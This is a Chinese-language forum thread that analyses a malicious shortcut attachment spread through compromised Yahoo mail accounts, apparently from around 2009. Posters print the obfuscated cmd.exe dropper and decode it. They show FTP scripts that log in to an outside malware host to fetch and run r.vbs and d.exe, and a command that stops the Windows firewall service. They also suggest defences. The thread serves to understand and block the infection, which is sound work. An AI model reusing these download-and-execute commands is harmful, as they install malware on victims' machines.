回覆: Yahoo 信箱寄過來的病毒檔,是何種病毒?
Yahoo帳號被盜用,才從Yahoo寄信出來
(不管是透過標準SMTP還是Yahoo Webmail)
那個是"一連串動作的捷徑"
並不是木馬本體
掃不出來,很正常
回覆: Yahoo 信箱寄過來的病毒檔,是何種病毒?
NIS 2010全殺
另外VT當然掃不出毒
因為他是做個捷徑到正常檔案
回覆: Yahoo 信箱寄過來的病毒檔,是何種病毒?
[QUOTE=FYI;1072977]"3.5 KB" 頂多只是惡意網站連結[/QUOTE]
FYI兄有興趣可以玩玩這東西
你就把它當.BAT檔來看就行了
.BAT檔如果有2K,能做的事情就多到跟山一樣了...
回覆: Yahoo 信箱寄過來的病毒檔,是何種病毒?
[QUOTE=FYI;1072986].BAT 沒這麼容易從郵件裡執行吧! 就小弟的研判, 首先郵件是HTML 格式, 然後夾帶一個附件, 以HTML 語法執行一個附加檔案, 這點不太可能, 因為檔案必須先儲存, 若在HTML 內容直接執行指令, 這點小弟就外行了
用猜的還不如直接打開來看, 果然是兩個 "小么.lnk"[/QUOTE]
是沒那麼容易執行啊
因為都要使用者自己笨笨的點下去啊 :fd:
既然都點下去了,當然就愛怎麼搞就怎麼搞
我不知道在大多數人的環境下,看不看得到那個副檔名??
(沒在用Outlook express,也很少用Webmail...)
PS:其實應該要問,他們到底在不在意中木馬?
回覆: Yahoo 信箱寄過來的病毒檔,是何種病毒?
請問那個 *.lnk 病毒的內容的目標欄位應該是指令,這些指令為何好像都被編碼?
請問如何將他還原為一般的指令?
%coMsPeC% /C set M=p -s:j&SeT N=.&sET y=G03&sET v=33&SeT e=echO &EcHo %e%o WWw%n%%y%Z%N%CoM^>J>B&EChO %E%AA%v%^>^>j>>B&ecHO %E%bb%v%^>^>j>>B&echo %e%rECV r r.Vbs^>^>J>>B&ECho %E%bY^>^>J>>b&ECho Ft%M%>>b&EchO STaRT r.VBs>>b&reN b u.BAT&CaLl U.Bat&
回覆: Yahoo 信箱寄過來的病毒檔,是何種病毒?
[QUOTE=FYI;1073010]抱歉! 小弟直到現在才明白tvirus 兄的意思, %COMSPEC%, START r.VBS, Call U.BAT, 原來.lnk 只是障眼法, 針對的還是Windows 的漏洞, 可否請樓主貼出完整信件的原始內容?[/QUOTE]
透過Prcview去看看這LNK做了啥事...
1.
"C:\WINDOWS\system32\cmd.exe" /C set M=p -s:j&SeT N=.&sET y=G03&sET v=33&SeT e=echO &EcHo %e%o WWw%n%%y%Z%N%CoM^>J>B&EChO %E%AA%v%^>^>j>>B&ecHO %E%bb%v%^>^>j>>B&echo %e%rECV r r.Vbs^>^>J>>B&ECho %E%bY^>^>J>>b&ECho Ft%M%>>b&EchO STaRT r.VBs>>b&reN b u.BAT&CaLl U.Bat&
2.
Ftp -s:j
先將1的部份以&來斷行
"C:\WINDOWS\system32\cmd.exe" /C set M=p -s:j
SeT N=.
sET y=G03
sET v=33
SeT e=echO
EcHo %e%o WWw%n%%y%Z%N%CoM^>J>B
EChO %E%AA%v%^>^>j>>B
ecHO %E%bb%v%^>^>j>>B
echo %e%rECV r r.Vbs^>^>J>>B
ECho %E%bY^>^>J>>b
ECho Ft%M%>>b
EchO STaRT r.VBs>>b
reN b u.BAT
CaLl U.Bat&
因為開始目錄為%windir%
所以在C:\WINDOWS產生了u.bat及J
C:\WINDOWS>type u.bat
%e%o WWw%n%%y%Z%N%CoM>J
%E%AA%v%>>j
%E%bb%v%>>j
%e%rECV r r.Vbs>>J
%E%bY>>J
Ft%M%
STaRT r.VBs
C:\WINDOWS>type j
o www . g03z . com
AA33
bb33
rECV r r.Vbs
bY
所以...目地是用ftp指令,代入script檔案J連到www . g03z . com
帳號密碼輸入後,抓r.vbs回來,然後下指令by斷線
過程:
C:\WINDOWS>ftp www . g03z . com
Connected to www . g03z . com.
220 Serv-U FTP Server v6.4 for WinSock ready...
User (www . g03z . com:(none)): AA33
331 User name okay, need password.
Password:
230 User logged in, proceed.
ftp> rECV r r.Vbs
200 PORT Command successful.
150 Opening ASCII mode data connection for r (1327 Bytes).
226-Maximum disk quota limited to 102400 kBytes
Used disk quota 0 kBytes, available 102400 kBytes
226 Transfer complete.
ftp: 1327 bytes received in 0.01Seconds 88.47Kbytes/sec.
ftp> by
221 Goodbye!
====================================================
然後u.bat最後再start r.vbs
至於那個r.vbs內容是啥...呃...交給你們了...
睡覺前最後PS:
那個g03z,好像是有名的放毒站...
最糟糕的是
主機它在台灣 :Q
[url]http://www.db.ripe.net/whois?form_type=advanced&full_query_string=&searchtext=202.153.172.43&do_search=Search&inverse_attributes=None&ip_search_lvl=Default%28nearest+match%29&alt_database=ALL&object_type=All[/url]
Domain Name : g03z.com
PunnyCode : g03z.com
Creation Date : 2009-01-08 16:50:39
Updated Date : 2009-01-08 16:50:39
Expiration Date : 2010-01-08 16:50:21
Registrant:
Organization : ggg zzz
Name : zzzzggg
Address : wefwefw wefwefwef
City : 34234234
Province/State : jiangsu
Country : CN
Postal Code : 234234
Administrative Contact:
Name : ggg zzz
Organization : zzzzggg
Address : wefwefw wefwefwef
City : 34234234
Province/State : jiangsu
Country : CN
Postal Code : 234234
Phone Number : 86--02586883333
Fax : 86--02586883333
Email : [email][email protected][/email]
Technical Contact:
Name : ggg zzz
Organization : zzzzggg
Address : wefwefw wefwefwef
City : 34234234
Province/State : jiangsu
Country : CN
Postal Code : 234234
Phone Number : 86--02586883333
Fax : 86--02586883333
Email : [email][email protected][/email]
Billing Contact:
Name : ggg zzz
Organization : zzzzggg
Address : wefwefw wefwefwef
City : 34234234
Province/State : jiangsu
Country : CN
Postal Code : 234234
Phone Number : 86--02586883333
Fax : 86--02586883333
Email : [email][email protected][/email]
Registry Status: ok
回覆: Yahoo 信箱寄過來的病毒檔,是何種病毒?
這台主機在 isp 是方電訊 哩.. 那ISP沒責任通知客戶可能主機被當木馬或行為異常嗎
回覆: Yahoo 信箱寄過來的病毒檔,是何種病毒?
r.vbs 動作
cmd /c net stop sharedaccess
echo o www.g03z.com>i.txt
echo aa33>>i.txt
echo bb33>>i.txt
echo get d d.exe>>i.txt
echo bye>>i.txt
ftp -s:i.txt
del i.txt
d.exe
del ?.vbs
del d.exe
start [url]http://tw.match.yahoo.com/[/url]
del ? ?.bat 0
基本上這一陣子的mail lnk病毒只要不允許FTP.EXE執行就可以全檔掉了.
回覆: Yahoo 信箱寄過來的病毒檔,是何種病毒?
或者是將FTP.EXE改名,平常用改名的FTP.EXE作業
像是FTP.EXE => FTP1.EXE
之後使用權限或IFEO或本機安全性原則鎖FTP.EXE不知可不可行?
回覆: Yahoo 信箱寄過來的病毒檔,是何種病毒?
[QUOTE=FYI;1073308][URL="http://www.microsoft.com/taiwan/technet/security/advisory/973882.mspx"]Microsoft 安全性摘要報告 (973882): Microsoft Active Template Library (ATL) 中的弱點可能會允許遠端執行程式碼[/URL]
[LIST][*]依照預設,所有 Microsoft Outlook 及 Microsoft Outlook Express 支援版本都會在 [限制的網站] 區域開啟 HTML 電子郵件訊息。 [限制的網站] 區域可阻止讀取 HTML 電子郵件訊息時使用 Active Scripting 與 ActiveX 控制項,有助於減輕企圖利用這個弱點的攻擊。然而,如果使用者按下電子郵件訊息中的連結,仍有可能因為網頁式攻擊而受此弱點遭利用的影響。[*]在網頁式攻擊的案例中,攻擊者可架設一個網站,並在其中包含利用此弱點的網頁。此外,受侵害的網站以及接受或存放使用者提供之內容或廣告的網站裡,也可能包含蓄意製作以利用本弱點的內容。 但是,攻擊者無法強迫使用者造訪網站,而是引誘使用者自行前往。一般的做法是設法讓使用者按一下電子郵件或 Instant Messenger 訊息中通往攻擊者網站的連結。[/LIST]
[URL="http://www.microsoft.com/taiwan/technet/security/bulletin/ms09-034.mspx"]Microsoft 安全性公告 MS09-034 - 重大: Internet Explorer 積存安全性更新 (972260)[/URL]
[LIST][*][URL="http://www.microsoft.com/downloads/details.aspx?displaylang=zh-tw&FamilyID=22bed634-5227-4a22-8df5-801f3e2e232a"]下載詳細資料: KB972260:Internet Explorer for Windows XP 安全性更新[/URL] (for IE6 x86)[/LIST][/QUOTE]
Oh
那些Yahoo病毒信沒這麼高竿
只是很單純的寫了一些文字
然後夾檔要讓你點下去而已
[IMG]http://www.pczone.com.tw/members/33275-albums14-picture-440.png[/IMG]